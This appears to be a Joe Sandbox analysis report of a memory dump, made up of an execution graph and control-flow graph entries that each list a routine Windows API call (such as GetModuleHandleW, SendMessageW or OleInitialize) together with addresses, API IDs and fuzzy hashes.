                                                                                                                                                                                                                              execution_graph 26702 dbacc8 26705 dbadb1 26702->26705 26703 dbacd7 26706 dbadf4 26705->26706 26707 dbadd1 26705->26707 26706->26703 26707->26706 26708 dbaff8 GetModuleHandleW 26707->26708 26709 dbb025 26708->26709 26709->26703 26743 dbd178 26744 dbd1be 26743->26744 26748 dbd358 26744->26748 26751 dbd347 26744->26751 26745 dbd2ab 26754 dbb410 26748->26754 26752 dbd386 26751->26752 26753 dbb410 DuplicateHandle 26751->26753 26752->26745 26753->26752 26755 dbd3c0 DuplicateHandle 26754->26755 26756 dbd386 26755->26756 26756->26745 26763 db4668 26764 db467a 26763->26764 26765 db4686 26764->26765 26769 db4779 26764->26769 26774 db3e10 26765->26774 26767 db46a5 26770 db479d 26769->26770 26778 db4888 26770->26778 26782 db4878 26770->26782 26775 db3e1b 26774->26775 26790 db5ca4 26775->26790 26777 db6fed 26777->26767 26780 db48af 26778->26780 26779 db498c 26779->26779 26780->26779 26786 db4248 26780->26786 26784 db48af 26782->26784 26783 db498c 26783->26783 26784->26783 26785 db4248 CreateActCtxA 26784->26785 26785->26783 26787 db5918 CreateActCtxA 26786->26787 26789 db59db 26787->26789 26789->26789 26791 db5caf 26790->26791 26794 db5cc4 26791->26794 26793 db710d 26793->26777 26795 db5ccf 26794->26795 26798 db5cf4 26795->26798 26797 db71e2 26797->26793 26799 db5cff 26798->26799 26800 db5d24 2 API calls 26799->26800 26801 db72e5 26800->26801 26801->26797 26539 71d19d8 26540 71d1a1a 26539->26540 26541 71d1a20 SetWindowTextW 26539->26541 26540->26541 26542 71d1a51 26541->26542 26543 71d0858 26546 71d0891 26543->26546 26544 71d0ac5 26562 dbda4c 26544->26562 26566 dbf052 26544->26566 26570 dbf158 26544->26570 26545 71d0b18 26546->26544 26552 71d377f 26546->26552 26557 71d3780 26546->26557 26553 71d378e 26552->26553 26554 71d3792 SendMessageW 26552->26554 26553->26544 26556 71d3844 26554->26556 26556->26544 26558 71d378e 26557->26558 26559 71d3792 SendMessageW 26557->26559 26558->26544 26561 71d3844 26559->26561 26561->26544 26563 dbda57 26562->26563 26565 dbf085 26563->26565 26574 db8304 26563->26574 26565->26545 26567 dbf07f 26566->26567 26569 dbf085 26566->26569 26568 db8304 2 API calls 26567->26568 26567->26569 26568->26569 26569->26545 26571 dbf16c 26570->26571 26572 db8304 2 API calls 26571->26572 26573 dbf187 26571->26573 26572->26573 26573->26545 26575 db82ee 26574->26575 26576 db8302 26575->26576 26578 db85eb 26575->26578 26585 dba989 26575->26585 26589 dba998 26575->26589 26593 dba560 26575->26593 26600 dba550 26575->26600 26576->26565 26577 db8629 26577->26565 26578->26577 26607 dbcd90 26578->26607 26612 dbcd81 26578->26612 26586 dba9b3 26585->26586 26587 db8304 2 API calls 26586->26587 26588 dba9cb 26586->26588 26587->26588 26588->26578 26590 dba9b3 26589->26590 26591 dba9cb 26590->26591 26592 db8304 2 API calls 26590->26592 26591->26578 26592->26591 26594 dba582 26593->26594 26595 dba560 2 API calls 26594->26595 26596 dba5e8 26594->26596 26597 dba7ef 26595->26597 26596->26578 26598 db8304 2 API calls 26597->26598 26599 dba942 26597->26599 26598->26599 26599->26578 26602 dba555 26600->26602 26601 dba5e8 26601->26578 26602->26601 26603 dba560 2 API calls 26602->26603 26604 dba7ef 26603->26604 26605 db8304 2 API calls 26604->26605 26606 dba942 26604->26606 26605->26606 26606->26578 26609 dbcdb1 26607->26609 26608 dbcdd5 26608->26577 26609->26608 26617 dbd05f 26609->26617 26621 dbd060 26609->26621 26613 dbcdb1 26612->26613 26614 dbcdd5 26613->26614 26615 dbd05f 2 API calls 26613->26615 26616 dbd060 2 API calls 26613->26616 26614->26577 26615->26614 26616->26614 26619 dbd06d 26617->26619 26618 dbd0a7 26618->26608 26619->26618 26625 dbb348 26619->26625 26623 dbd06d 26621->26623 26622 dbd0a7 26622->26608 26623->26622 26624 dbb348 2 API calls 26623->26624 26624->26622 26626 dbb353 26625->26626 26628 dbddc0 26626->26628 26629 dbb42c 26626->26629 26628->26628 26630 dbb437 26629->26630 26631 dbde2f 26630->26631 26651 db5d24 26630->26651 26633 dbde3e 26631->26633 26638 dbdea8 26631->26638 26642 dbde9e 26631->26642 26646 dbd7ac 26633->26646 26635 dbde58 26635->26628 26639 dbded6 26638->26639 26640 dbdfa2 KiUserCallbackDispatcher 26639->26640 26641 dbdfa7 26639->26641 26640->26641 26643 dbded6 26642->26643 26644 dbdfa2 KiUserCallbackDispatcher 26643->26644 26645 dbdfa7 26643->26645 26644->26645 26649 dbd7b7 26646->26649 26647 dbda4c 2 API calls 26648 dbefc4 26647->26648 26648->26635 26649->26647 26650 dbefc9 26649->26650 26650->26635 26652 db5d2f 26651->26652 26654 db85eb 26652->26654 26655 dba989 2 API calls 26652->26655 26656 dba998 2 API calls 26652->26656 26657 dba550 2 API calls 26652->26657 26658 dba560 2 API calls 26652->26658 26653 db8629 26653->26631 26654->26653 26659 dbcd81 2 API calls 26654->26659 26660 dbcd90 2 API calls 26654->26660 26655->26654 26656->26654 26657->26654 26658->26654 26659->26653 26660->26653 26710 71df288 DispatchMessageW 26711 71df2f4 26710->26711 26757 71d503b 26758 71d504e 26757->26758 26761 71d5320 PostMessageW 26758->26761 26759 71d5071 26762 71d538c 26761->26762 26762->26759 26661 71d0b50 26662 71d0b69 26661->26662 26663 71d0b73 26661->26663 26662->26663 26666 71d6810 26662->26666 26672 71d6800 26662->26672 26667 71d682a 26666->26667 26670 71d683d 26666->26670 26678 71d55b8 26667->26678 26669 71d6883 26669->26663 26670->26669 26671 71d55b8 OleInitialize 26670->26671 26671->26669 26673 71d682a 26672->26673 26676 71d683d 26672->26676 26674 71d55b8 OleInitialize 26673->26674 26674->26676 26675 71d6883 26675->26663 26676->26675 26677 71d55b8 OleInitialize 26676->26677 26677->26675 26680 71d55c3 26678->26680 26679 71d68ae 26679->26670 26680->26679 26683 71d68e8 26680->26683 26689 71d68e7 26680->26689 26684 71d6bf0 26683->26684 26685 71d6910 26683->26685 26684->26679 26686 71d6919 26685->26686 26695 71d5654 26685->26695 26686->26679 26688 71d693c 26690 71d6bf0 26689->26690 26691 71d6910 26689->26691 26690->26679 26692 71d6919 26691->26692 26693 71d5654 OleInitialize 26691->26693 26692->26679 26694 71d693c 26693->26694 26696 71d565f 26695->26696 26697 71d6c33 26696->26697 26699 71d5670 26696->26699 26697->26688 26700 71d6c68 OleInitialize 26699->26700 26701 71d6ccc 26700->26701 26701->26697 26712 71d1f80 26713 71d1f90 26712->26713 26717 71d1fb8 SendMessageW 26713->26717 26719 71d1fb0 SendMessageW 26713->26719 26714 71d1fa1 26718 71d2024 26717->26718 26718->26714 26720 71d2024 26719->26720 26720->26714 26721 71d0040 26722 71d0065 26721->26722 26723 71d010e 26722->26723 26726 71d0490 26722->26726 26730 71d0480 26722->26730 26729 71d0480 2 API calls 26726->26729 26738 71d04b8 26726->26738 26727 71d04a4 26727->26723 26729->26727 26731 71d0494 26730->26731 26734 71d04b8 2 API calls 26731->26734 26735 71d0480 2 API calls 26731->26735 26732 71d04a2 26732->26723 26733 71d04f2 26732->26733 26736 dbdea8 KiUserCallbackDispatcher 26732->26736 26737 dbde9e KiUserCallbackDispatcher 26732->26737 26733->26723 26734->26732 26735->26732 26736->26733 26737->26733 26739 71d04de 26738->26739 26740 71d04f2 26739->26740 26741 dbdea8 KiUserCallbackDispatcher 26739->26741 26742 dbde9e KiUserCallbackDispatcher 26739->26742 26740->26727 26741->26740 26742->26740

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 507 dbadb1-dbadcf 508 dbadfb-dbadff 507->508 509 dbadd1-dbadde call db9d10 507->509 510 dbae13-dbae54 508->510 511 dbae01-dbae0b 508->511 516 dbade0 509->516 517 dbadf4 509->517 518 dbae61-dbae6f 510->518 519 dbae56-dbae5e 510->519 511->510 562 dbade6 call dbb458 516->562 563 dbade6 call dbb448 516->563 564 dbade6 call dbb420 516->564 517->508 520 dbae93-dbae95 518->520 521 dbae71-dbae76 518->521 519->518 524 dbae98-dbae9f 520->524 525 dbae78-dbae7f call db9d1c 521->525 526 dbae81 521->526 522 dbadec-dbadee 522->517 523 dbaf30-dbaff0 522->523 557 dbaff8-dbb023 GetModuleHandleW 523->557 558 dbaff2-dbaff5 523->558 528 dbaeac-dbaeb3 524->528 529 dbaea1-dbaea9 524->529 527 dbae83-dbae91 525->527 526->527 527->524 531 dbaec0-dbaec9 call db9d2c 528->531 532 dbaeb5-dbaebd 528->532 529->528 538 dbaecb-dbaed3 531->538 539 dbaed6-dbaedb 531->539 532->531 538->539 540 dbaef9-dbaf06 539->540 541 dbaedd-dbaee4 539->541 547 dbaf29-dbaf2f 540->547 548 dbaf08-dbaf26 540->548 541->540 543 dbaee6-dbaef6 call db9d3c call db9d4c 541->543 543->540 548->547 559 dbb02c-dbb040 557->559 560 dbb025-dbb02b 557->560 558->557 560->559 562->522 563->522 564->522
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 00DBB016
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000008.00000002.4126660793.0000000000DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_db0000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: HandleModule
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4139908857-0
                                                                                                                                                                                                                              • Opcode ID: 0dcf067a8549dc40b8e1e4c84a370c58f63a6d414719d77fc3c9cad6f1c21351
                                                                                                                                                                                                                              • Instruction ID: 786e0f0c1d04070cdaaf81de885b133bcc527aa902732b0d9124dbe719858404
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0dcf067a8549dc40b8e1e4c84a370c58f63a6d414719d77fc3c9cad6f1c21351
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D98124B0A00B45CFDB24DF2AD55179ABBF1FF88300F04892EE48A97A50D775E945CBA1

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 565 db4248-db59d9 CreateActCtxA 568 db59db-db59e1 565->568 569 db59e2-db5a3c 565->569 568->569 576 db5a4b-db5a4f 569->576 577 db5a3e-db5a41 569->577 578 db5a51-db5a5d 576->578 579 db5a60 576->579 577->576 578->579 580 db5a61 579->580 580->580
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • CreateActCtxA.KERNEL32(?), ref: 00DB59C9
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000008.00000002.4126660793.0000000000DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_db0000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Create
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2289755597-0
                                                                                                                                                                                                                              • Opcode ID: 507786bc2d63b516da3102f10f3ae242c4f124e8a8c998ffd7d15a2c4c622f16
                                                                                                                                                                                                                              • Instruction ID: 904b78f466d309a50ec9fee09e3cc999090dfd7661ed0702c10cf2110ffc7379
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 507786bc2d63b516da3102f10f3ae242c4f124e8a8c998ffd7d15a2c4c622f16
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EE41D2B0D00619CFDB24CFA9C884BDDBBB5BF49304F24816AD409AB265DB756945CFA0

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 582 db590d-db5913 583 db591c-db59d9 CreateActCtxA 582->583 585 db59db-db59e1 583->585 586 db59e2-db5a3c 583->586 585->586 593 db5a4b-db5a4f 586->593 594 db5a3e-db5a41 586->594 595 db5a51-db5a5d 593->595 596 db5a60 593->596 594->593 595->596 597 db5a61 596->597 597->597
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • CreateActCtxA.KERNEL32(?), ref: 00DB59C9
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000008.00000002.4126660793.0000000000DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_db0000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Create
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2289755597-0
                                                                                                                                                                                                                              • Opcode ID: bbbb8cf9dfeec20582e8a648fd6765d78b06780ffcf4f2d53e55aac88eea90ec
                                                                                                                                                                                                                              • Instruction ID: cd265221f26599be14b1ecaa7ae141ff4699e3c8a7e6c5f0b7c0000876c667e6
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bbbb8cf9dfeec20582e8a648fd6765d78b06780ffcf4f2d53e55aac88eea90ec
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9841F1B0D00619CFDB24CFA9C8847CDBBB6BF49304F24816AD409BB265DB756986CF90

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 599 71d3780-71d378c 600 71d378e-71d3791 599->600 601 71d3792-71d3842 SendMessageW 599->601 607 71d384b-71d385f 601->607 608 71d3844-71d384a 601->608 608->607
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • SendMessageW.USER32(?,?,?,?), ref: 071D3835
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000008.00000002.4140421385.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_71d0000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: MessageSend
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3850602802-0
                                                                                                                                                                                                                              • Opcode ID: d4c38963765b8ed3b70067d8f96f36f2d0a09c9a15deb3a7cd6c513370eee920
                                                                                                                                                                                                                              • Instruction ID: 87079f50bc3e6423312bf257dc342125aed30b0d9f2ad7de8e117b3b668fe06c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d4c38963765b8ed3b70067d8f96f36f2d0a09c9a15deb3a7cd6c513370eee920
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A32177B5A00248DFCB10DFA9C485A9EBFF4EF48310F20846AE458A7761C770A980CFA1

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 610 71d19a8-71d1a18 613 71d1a1a-71d1a1d 610->613 614 71d1a20-71d1a4f SetWindowTextW 610->614 613->614 615 71d1a58-71d1a79 614->615 616 71d1a51-71d1a57 614->616 616->615
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • SetWindowTextW.USER32(?,00000000), ref: 071D1A42
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000008.00000002.4140421385.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_71d0000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: TextWindow
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 530164218-0
                                                                                                                                                                                                                              • Opcode ID: 096957dc5e2a2a2a7aa71a56232a1c8af187cc84bc205ef7357d11844b867716
                                                                                                                                                                                                                              • Instruction ID: 6bebc1dd2a3541a27d84fc22a092d4276c6a0685a760dcf6c03d09dc6bc06234
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 096957dc5e2a2a2a7aa71a56232a1c8af187cc84bc205ef7357d11844b867716
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C22181B18093998FDB01CFA9D9547DEBFF0AF49310F05809BD494A7292D3389549CF65

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 618 dbb410-dbd454 DuplicateHandle 620 dbd45d-dbd47a 618->620 621 dbd456-dbd45c 618->621 621->620
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00DBD386,?,?,?,?,?), ref: 00DBD447
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000008.00000002.4126660793.0000000000DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_db0000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: DuplicateHandle
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3793708945-0
                                                                                                                                                                                                                              • Opcode ID: 7589ae1028bd292105af70f0eefff9d5c6df82bab87a48252714ae55e2fb694e
                                                                                                                                                                                                                              • Instruction ID: 37eb7bd498c4e69a8fa8e2d66420213da5bec67ab0913109a858c917dd40b7ec
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7589ae1028bd292105af70f0eefff9d5c6df82bab87a48252714ae55e2fb694e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B32114B5900248EFDB10CF9AD584ADEFBF5EB48310F14801AE958A3320D374A940CFA5

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 624 dbd3b8-dbd454 DuplicateHandle 625 dbd45d-dbd47a 624->625 626 dbd456-dbd45c 624->626 626->625
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00DBD386,?,?,?,?,?), ref: 00DBD447
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000008.00000002.4126660793.0000000000DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_db0000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: DuplicateHandle
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3793708945-0
                                                                                                                                                                                                                              • Opcode ID: da2c03653678d704382768b97ffb22ba8dfa1faa27f06b7ae39dd9f2c2dc2b76
                                                                                                                                                                                                                              • Instruction ID: 8ce508e23944d10369ed49714b1fca3810fbd364c5af1ae55d64a3637125f3d1
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: da2c03653678d704382768b97ffb22ba8dfa1faa27f06b7ae39dd9f2c2dc2b76
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1521E2B5900218EFDB10CFAAD584ADEFFF5EB48320F14841AE958A7311D374A945CFA5

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 629 71d19d8-71d1a18 630 71d1a1a-71d1a1d 629->630 631 71d1a20-71d1a4f SetWindowTextW 629->631 630->631 632 71d1a58-71d1a79 631->632 633 71d1a51-71d1a57 631->633 633->632
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • SetWindowTextW.USER32(?,00000000), ref: 071D1A42
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000008.00000002.4140421385.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_71d0000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: TextWindow
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 530164218-0
                                                                                                                                                                                                                              • Opcode ID: ab3f254e5f5daf5597590b2650f564af09f0a15a763edb1b417fa76e91848edd
                                                                                                                                                                                                                              • Instruction ID: 2e8966340ddae67fd99cc0bf289f3ce0ae1dc0cf28df75185106c28310d0df21
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ab3f254e5f5daf5597590b2650f564af09f0a15a763edb1b417fa76e91848edd
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 401153B2C002499FDB10CF9AC444BDEFBF4EB88320F10C02AD858A7250D338A545CFA0

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 635 71d5320-71d538a PostMessageW 636 71d538c-71d5392 635->636 637 71d5393-71d53b4 635->637 636->637
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • PostMessageW.USER32(?,?,?,?), ref: 071D537D
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000008.00000002.4140421385.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_71d0000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: MessagePost
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 410705778-0
                                                                                                                                                                                                                              • Opcode ID: 8aa9000572f40e9302ee7c27a961ea2bd463da0a52954ea4a5d0f340f037b7d6
                                                                                                                                                                                                                              • Instruction ID: 051ff6a43df41eb21b213911265100d8c4b019960727f7b9aefbce7ee128c1d9
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8aa9000572f40e9302ee7c27a961ea2bd463da0a52954ea4a5d0f340f037b7d6
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 511106B5800349DFDB10CF9AC945BDEFBF8EB48320F108459E558A7251D3B8A984CFA5

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 639 dbafb0-dbaff0 640 dbaff8-dbb023 GetModuleHandleW 639->640 641 dbaff2-dbaff5 639->641 642 dbb02c-dbb040 640->642 643 dbb025-dbb02b 640->643 641->640 643->642
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 00DBB016
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000008.00000002.4126660793.0000000000DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_db0000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: HandleModule
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4139908857-0
                                                                                                                                                                                                                              • Opcode ID: fccb7421306f806f13c4e1040370f784645294045c064336dd6efe2919dfca93
                                                                                                                                                                                                                              • Instruction ID: 8010b2d64242796d074fb526297948f5badcb26058149ffb32f8032a51fc0658
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fccb7421306f806f13c4e1040370f784645294045c064336dd6efe2919dfca93
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BA11DFB6C00249CFCB24DF9AC444ADEFBF4AB89324F14846AD469A7210D3B5A545CFA5

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 645 71d1fb0-71d2022 SendMessageW 646 71d202b-71d203f 645->646 647 71d2024-71d202a 645->647 647->646
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • SendMessageW.USER32(?,?,?,?), ref: 071D2015
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000008.00000002.4140421385.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_71d0000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: MessageSend
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3850602802-0
                                                                                                                                                                                                                              • Opcode ID: 0e105cf981dd10fa907e86fd3273c1a19c89a712fdf47acf7e7a364dbe07db44
                                                                                                                                                                                                                              • Instruction ID: eaad4697787bedaa770262e9465b9ac1506efdfcbbce188e4451f070382231e9
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0e105cf981dd10fa907e86fd3273c1a19c89a712fdf47acf7e7a364dbe07db44
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1E11F2B5800259DFCB10CF99C989BDEBBF4FB08310F10885AD558A7250D375A984CFA0

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 649 71d5670-71d6cca OleInitialize 651 71d6ccc-71d6cd2 649->651 652 71d6cd3-71d6cf0 649->652 651->652
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • OleInitialize.OLE32(00000000), ref: 071D6CBD
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000008.00000002.4140421385.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_71d0000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Initialize
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2538663250-0
                                                                                                                                                                                                                              • Opcode ID: 4a35dc7635fd8853dd56d7457babcf3678a5a8de47cb0a69fead892fc723d24d
                                                                                                                                                                                                                              • Instruction ID: 853ded32c847ffbec0ae5a250fce9a60d5d26ea9b0e8823bb7fafc00ad58dde2
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4a35dc7635fd8853dd56d7457babcf3678a5a8de47cb0a69fead892fc723d24d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E01130B59003488FDB20DF9AC648BDEBBF8EB49324F208459D558A7360C374A944CFA4
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000008.00000002.4140421385.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_71d0000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: DispatchMessage
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2061451462-0
                                                                                                                                                                                                                              • Opcode ID: e645c2d921b960a5cb5eeeb8b3e62c63e8eb4c82c91369ece54bf548e7fafe8b
                                                                                                                                                                                                                              • Instruction ID: 768ccd7f632a9fd2ab51778c9bce4e1d57c1d0678695beaa616a54d097e87fe3
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e645c2d921b960a5cb5eeeb8b3e62c63e8eb4c82c91369ece54bf548e7fafe8b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E01133B5C00259CFCB10CF9AD444BCEFBF4EB48324F10842AD469A7210D374A545CFA5
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • SendMessageW.USER32(?,?,?,?), ref: 071D2015
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000008.00000002.4140421385.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_71d0000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: MessageSend
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3850602802-0
                                                                                                                                                                                                                              • Opcode ID: be98553be017181956b7d43f5dd6d2670eb2d2b5e097560b4e427d974450313c
                                                                                                                                                                                                                              • Instruction ID: 2edc546ef4f98b1e9d2fe25564159e5a4e4d45078835b8f503ac6822f60fc920
